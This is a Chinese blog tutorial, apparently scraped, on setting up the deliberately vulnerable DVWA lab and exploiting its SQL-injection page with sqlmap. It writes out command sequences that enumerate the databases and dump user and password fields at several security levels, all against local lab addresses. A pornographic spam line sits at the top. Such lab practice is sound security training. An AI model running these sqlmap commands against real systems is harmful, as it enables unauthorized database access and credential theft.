国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

SQL注入(DVWA靶場(chǎng)搭建及使用、sqlMap注入、sqlmap問(wèn)題及解決辦法)

這篇具有很好參考價(jià)值的文章主要介紹了SQL注入(DVWA靶場(chǎng)搭建及使用、sqlMap注入、sqlmap問(wèn)題及解決辦法)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

sqlmap使用教程

1、客戶端向服務(wù)端請(qǐng)求的流程

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

2、SQL注入常見(jiàn)分類

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

?3、SQL注入常見(jiàn)過(guò)程

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

?4、SQL注入的作用

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

?5、常用SQL測(cè)試語(yǔ)句

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

?注釋字符:

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

DVWA靶場(chǎng)搭建及使用(詳細(xì)圖文)

一、下載DVWA
下載地址:DVWA/README.zh.md at master · digininja/DVWA · GitHub
這里我是從GitHub上下載的,小伙伴們自行選擇

二、安裝DVWA
在安裝前,需要做一個(gè)準(zhǔn)備工作,我們先去做一個(gè)PHP+Mysql的環(huán)境搭建。

1.下載、安裝、啟動(dòng)phpstudy,小皮面板(phpstudy) - 讓天下沒(méi)有難配的服務(wù)器環(huán)境!

(phpStudy是一個(gè)PHP調(diào)試環(huán)境的程序集成包。恰好我們可以用到"PHP+Mysql+Apache"。)

注意開(kāi)啟apache和mysql

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

2、將下載的DVWA解壓到phpstudy網(wǎng)站根目錄下。

例如:我這解壓后的路徑是“D:\phpStudy\WWW\DVWA-master\”(這里為了后面進(jìn)入目錄方便,我會(huì)將文件名改成DVWA)

3、將 config.inc.php.dist 復(fù)制一份或重命令為 config.inc.php;

例如:我的配置文件路徑是“D:\phpStudy\WWW\DVWA-master\config”。

注意:有的小伙伴操作系統(tǒng)可能會(huì)默認(rèn)不顯示文件后綴名,改為顯示后綴名之后再重命名文件類型 config.inc.php.dist→config.inc.php。這步必須做。

4、修改 config.inc.php 里代碼如下:

$_DVWA[ 'db_server' ] ? = '127.0.0.1'; #數(shù)據(jù)庫(kù)地址
$_DVWA[ 'db_database' ] = 'dvwa'; #數(shù)據(jù)庫(kù)名稱
$_DVWA[ 'db_user' ] ? ? = 'root'; #數(shù)據(jù)庫(kù)用戶名
$_DVWA[ 'db_password' ] = 'root'; #數(shù)據(jù)庫(kù)密碼
因?yàn)閜hpstudy默認(rèn)的mysql數(shù)據(jù)庫(kù)地址是“127.0.0.1 或 localhost",用戶名和密碼都是"root"。主要是修改’db_password‘為root,這里很重要,修改后自然是需要保存文件的。

三、DVWA使用

1、設(shè)置或重置數(shù)據(jù)庫(kù)

瀏覽器只需要直接打開(kāi)“http://搭建環(huán)境的系統(tǒng)ip/DVWA-master/setup.php”即可!如果有”標(biāo)紅“提示,可能你要打開(kāi)一些模塊或做一些設(shè)置,否則有些是不能實(shí)驗(yàn)的,例如:文件包含、文件上傳漏洞。

????????????????如:紅色字體顯示“DVWA-PHP function allow_url_include: Disabled”錯(cuò)誤

????????????????需要改的不是DVWA文件夾下的php.ini,而是你安裝的php的php.ini。

????????????????由于我使用的是PHPstudy,找到所使用的php版本號(hào)所在文件夾,修改php.ini中的allow_url_include為On,錯(cuò)誤得到解決。

拉到下面,點(diǎn)擊Setup/Reset DB,點(diǎn)擊Create/Reset Database。會(huì)看到創(chuàng)建成功提示!

2、登陸

瀏覽器打開(kāi)”http://127.0.0.1/DVWA-master/login.php“登陸。默認(rèn)用戶名:admin,默認(rèn)密碼:password;

注意:若在kali中不能訪問(wèn)頁(yè)面,需要設(shè)置或關(guān)閉Windows服務(wù)器中防火墻。

3、設(shè)置程序安全級(jí)別
瀏覽器打開(kāi)”http://你自己ip/DVWA-master/security.php“來(lái)做設(shè)置,分別有”低、中、高、不可能“,程序安全級(jí)別越低,說(shuō)明越容易被攻破,沒(méi)有做任何的安全防護(hù)。主要是用來(lái)自我挑戰(zhàn)不同等級(jí)的程序防護(hù)級(jí)別的!

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

?環(huán)境配置好,可以開(kāi)打啦!

他山之石

sqlmap使用教程https://blog.csdn.net/Gherbirthday0916/article/details/126857683

DVWA靶場(chǎng)通關(guān)教程https://blog.csdn.net/CYwxh0125/article/details/122460851?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1-122460851-blog-127086871.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1-122460851-blog-127086871.pc_relevant_landingrelevant&utm_relevant_index=1

SQLMAP注入DVWA實(shí)戰(zhàn)https://blog.csdn.net/m0_62636343/article/details/124733514

?sqlmap問(wèn)題及解決辦法

利用sqlmap對(duì)DVWA中Low進(jìn)行SQL注入

輸入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1

?報(bào)錯(cuò):不可注入…提示

用一個(gè)帶上一個(gè)響應(yīng)包注入成功了

?切記: sqlmap.py -u 后面是跟URL
sqlmap.py -r 后面是跟響應(yīng)數(shù)據(jù)
sqlmap進(jìn)行注入時(shí),最好使用-r

最后再?gòu)?fù)習(xí)一下sqlmap注入命令:

1、是否存在注入點(diǎn)

python sqlmap.py -r “響應(yīng)包路徑”

2、獲取注入點(diǎn)所有數(shù)據(jù)庫(kù)

python sqlmap.py -r “響應(yīng)包路徑” --dbs

3、獲取當(dāng)前使用的數(shù)據(jù)庫(kù)

python sqlmap.py -r “響應(yīng)包路徑” --current-db --batch

4、獲取數(shù)據(jù)庫(kù)中的表

python sqlmap.py -r “響應(yīng)包路徑” --table -D “數(shù)據(jù)庫(kù)名” --batch

5、獲取表中的字段信息

python sqlmap.py -r “響應(yīng)包路徑” --columns -T “表名” -D “獲取的數(shù)據(jù)庫(kù)名” --batch

6、獲取字段具體信息

python sqlmap.py -r “響應(yīng)包路徑” --dump -C “字段名(可多個(gè))” --columns -T “表名” -D “數(shù)據(jù)庫(kù)名” --batch

7、當(dāng)前使用的賬戶

python sqlmap.py -r “響應(yīng)包路徑” --current-user

8、列出所有使用過(guò)的賬戶

python sqlmap.py -r “響應(yīng)包路徑” –users

9、mysql的登錄賬戶和密碼

python sqlmap.py -r “響應(yīng)包路徑” –passwords

例1:sqlmap.py -r 后面是跟響應(yīng)數(shù)據(jù)

第一步:復(fù)制durp工具捕獲的請(qǐng)求代碼,生成aa.txt文件。

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

第二步:sqlmap 注入

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

sqlmap -r "/home/hfy/桌面/aa.txt" -D dvwa -T users -C user,password --dump

獲得數(shù)據(jù)庫(kù)

獲得dvwa庫(kù)中表

獲得users表中列(字段)

獲得user,password字段值。

例2:sqlmap.py -u 后面是跟URL

第一步:durp工具捕獲的請(qǐng)求COOKies

瀏覽器登錄dvwa靶場(chǎng)——設(shè)置安全級(jí)為L(zhǎng)OW——選擇SQL Injection——輸入任意ID號(hào)——點(diǎn)擊Submit(瀏覽器要啟用代理:127.0.0.1,端口8080)

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

durp中在Proxy下開(kāi)啟Intercept is on

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

第二步:sqlmap注入

使用-u參數(shù)來(lái)指定目標(biāo)URL,--dbs進(jìn)行數(shù)據(jù)庫(kù)爆破

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --dbs

之后可得到數(shù)據(jù)庫(kù)信息:

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

爆破成功,接下來(lái)可進(jìn)行數(shù)據(jù)庫(kù)查看等一系列操作。

-D dvwa -tables: 查看數(shù)據(jù)庫(kù)dvwa中的表

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -tables

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

-T users -columns:查看表user中的字段名

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -T users -columns
sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

-C user,password --dump:獲取字段user,password信息

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie "security=low; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" -D dvwa -T users -C user,password --dump

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

.DVWA等級(jí)--mid爆破方法:

同例1:sqlmap.py -r 后面是跟響應(yīng)數(shù)據(jù)

DVWA等級(jí)--high爆破方法:

需要二階sql注入(--second-order)

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" --dbs

sqlmap dvwa,網(wǎng)絡(luò)安全教程,安全,運(yùn)維,mysql,網(wǎng)絡(luò),數(shù)據(jù)庫(kù)

?可以查看數(shù)據(jù)庫(kù)信息了。

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -tables

得到了數(shù)據(jù)中表信息。

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -T users -columns
得到了表中字段信息。

sqlmap -u "http://192.168.1.2/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=high; PHPSESSID=0sqh5r9gjs3kog9cd3uvq1vhgv" --second-url "http://192.168.1.2/dvwa/vulnerabilities/sqli/session-input.php" -D dvwa -T users -C user,password -dump

得到了user,password字段的值。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-819025.html

到了這里,關(guān)于SQL注入(DVWA靶場(chǎng)搭建及使用、sqlMap注入、sqlmap問(wèn)題及解決辦法)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【網(wǎng)絡(luò)安全-sql注入(5)】sqlmap以及幾款自動(dòng)化sql注入工具的詳細(xì)使用過(guò)程(提供工具)

    【網(wǎng)絡(luò)安全-sql注入(5)】sqlmap以及幾款自動(dòng)化sql注入工具的詳細(xì)使用過(guò)程(提供工具)

    分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過(guò)程中用心寫(xiě)的,可以點(diǎn)開(kāi)以下鏈接獲取: 超詳細(xì)的網(wǎng)絡(luò)安全筆記 (也可以拿自己的環(huán)鏡來(lái)玩,我是用pikachu靶場(chǎng)來(lái)演示的) 【網(wǎng)路安全 --- pikachu靶場(chǎng)安裝】超詳細(xì)的pikachu靶場(chǎng)安裝教程(提供靶場(chǎng)代碼及工具)_網(wǎng)絡(luò)安全_Ai

    2024年02月08日
    瀏覽(19)
  • 使用burpsuite抓包 + sql工具注入 dvwa初級(jí)靶場(chǎng)

    使用burpsuite抓包 + sql工具注入 dvwa初級(jí)靶場(chǎng)

    記錄一下自己重新開(kāi)始學(xué)習(xí)web安全之路②。 1.工具準(zhǔn)備 sqlmap + burpsuite 2.瀏覽器準(zhǔn)備 火狐瀏覽器 + 設(shè)置代理。 首先,先設(shè)置一下火狐瀏覽器的代理 http代理地址為127.0.0.0.1 ,端口為8080 3.burpsuite 準(zhǔn)備 將burpsuite的抓包功能打開(kāi)。 注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要

    2024年02月07日
    瀏覽(19)
  • SQL注入 - sqlmap聯(lián)動(dòng)burpsuite之burp4sqlmap++插件

    SQL注入 - sqlmap聯(lián)動(dòng)burpsuite之burp4sqlmap++插件

    目錄 sqlmap和burpsuite介紹 sqlmap4burp++介紹 sqlmap4burp++的使用 小插曲:sqlmap報(bào)錯(cuò)文件不存在怎么辦? SqlMap sqlmap 是一款自動(dòng)化檢測(cè)與利用SQL注入漏洞的免費(fèi)開(kāi)源工具。 可用于檢測(cè)利用五種不同類型的SQL注入: 布爾型盲注(Boolean-based blind)即可以根據(jù)返回頁(yè)面判斷條件真假的注入

    2024年03月12日
    瀏覽(23)
  • SQL注入工具之SQLmap入門操作

    SQL注入工具之SQLmap入門操作

    了解SQLmap 基礎(chǔ)操作 SQLmap 是一款自動(dòng)化的 SQL 注入工具,可以用于檢測(cè)和利用SQL注入漏洞。 以下是 SQLmap 的入門操作步驟: 1.下載 SQLmap :可以從官方網(wǎng)站(https://sqlmap.org/)下載最新版本的SQLmap。 2.打開(kāi)終端 :在終端中進(jìn)入 SQLmap 所在的目錄。 3.輸入命令 :使用以下命令運(yùn)行

    2024年02月21日
    瀏覽(23)
  • 【2023最新版】超詳細(xì)Sqlmap安裝保姆級(jí)教程,SQL注入使用指南,收藏這一篇就夠了

    【2023最新版】超詳細(xì)Sqlmap安裝保姆級(jí)教程,SQL注入使用指南,收藏這一篇就夠了

    一、sqlmap簡(jiǎn)介 sqlmap是一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描,發(fā)現(xiàn)并利用給定的URL進(jìn)行SQL注入。目前支持的數(shù)據(jù)庫(kù)有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5種獨(dú)特的SQL注入技術(shù) 基于布爾類型的盲注,即可以根據(jù)

    2024年02月10日
    瀏覽(26)
  • WEB漏洞-SQL注入-利用SQLMAP工具繞過(guò)WAF

    WEB漏洞-SQL注入-利用SQLMAP工具繞過(guò)WAF

    訪問(wèn)使用阿里云搭建的網(wǎng)站(存在自帶的阿里云盾)。 可以看到此時(shí)網(wǎng)站可以正常訪問(wèn),可以進(jìn)行正常注入。 使用工具進(jìn)行注入。 可以看到在使用工具注入沒(méi)多久后便返回了不存在注入點(diǎn)的信息。 因?yàn)榻?jīng)常會(huì)用到SQLMAP這款工具對(duì)注入點(diǎn)進(jìn)行檢測(cè),在遇到WAF時(shí),如果還想繼續(xù)

    2024年02月12日
    瀏覽(25)
  • 在kali linux里利用SQLmap實(shí)現(xiàn)SQL注入

    在kali linux里利用SQLmap實(shí)現(xiàn)SQL注入

    SQLMap 是一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過(guò)插件,支持的數(shù)據(jù)庫(kù)是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用來(lái)檢測(cè)和利用sql注入點(diǎn),并不

    2024年02月04日
    瀏覽(24)
  • 【SQL注入】SQLMAP v1.7.11.1 漢化版

    【SQL注入】SQLMAP v1.7.11.1 漢化版

    【SQL注入】SQLMAP v1.7.11.1 漢化版 SQLMAP是一款開(kāi)源的自動(dòng)化SQL注入工具,用于掃描和利用Web應(yīng)用程序中的SQL注入漏洞。它在安全測(cè)試領(lǐng)域被廣泛應(yīng)用,可用于檢測(cè)和利用SQL注入漏洞,以驗(yàn)證應(yīng)用程序的安全性。 SQL注入是一種常見(jiàn)的Web應(yīng)用程序漏洞,攻擊者可以通過(guò)在用戶輸入的

    2024年01月19日
    瀏覽(20)
  • sqlmap 是一個(gè)自動(dòng)化的 sql 注入滲透工具

    一.介紹 sqlmap 是一個(gè)自動(dòng)化的 sql 注入滲透工具,指紋檢測(cè)、注入方式、注入成功后的取數(shù)據(jù)等等都是自動(dòng)化的,sqlmap 還提供了很多腳本.但在實(shí)踐測(cè)試的時(shí)候基本用不上.用于檢測(cè)和利用 Web 應(yīng)用程序中的 SQL 注入漏洞。它自動(dòng)化了識(shí)別和利用 SQL 注入漏洞的過(guò)程,并可用于執(zhí)

    2024年01月23日
    瀏覽(19)
  • DVWA靶場(chǎng)中SQL注入

    DVWA靶場(chǎng)中SQL注入

    1.1.1.Low級(jí)別 ??1)判斷注入類型當(dāng)輸入1和1 and 1=2的時(shí)候均能夠正常返回?cái)?shù)值,證明不是數(shù)字型輸入。那么這里基本上就能夠判斷是字符型注入。 ??2)判斷字符型注入。輸入1’ and 1=2 #的時(shí)候出現(xiàn)報(bào)錯(cuò),證明存在字符型注入,并且單引號(hào)閉合。 ??3)判斷有多少列當(dāng)輸入

    2024年02月03日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包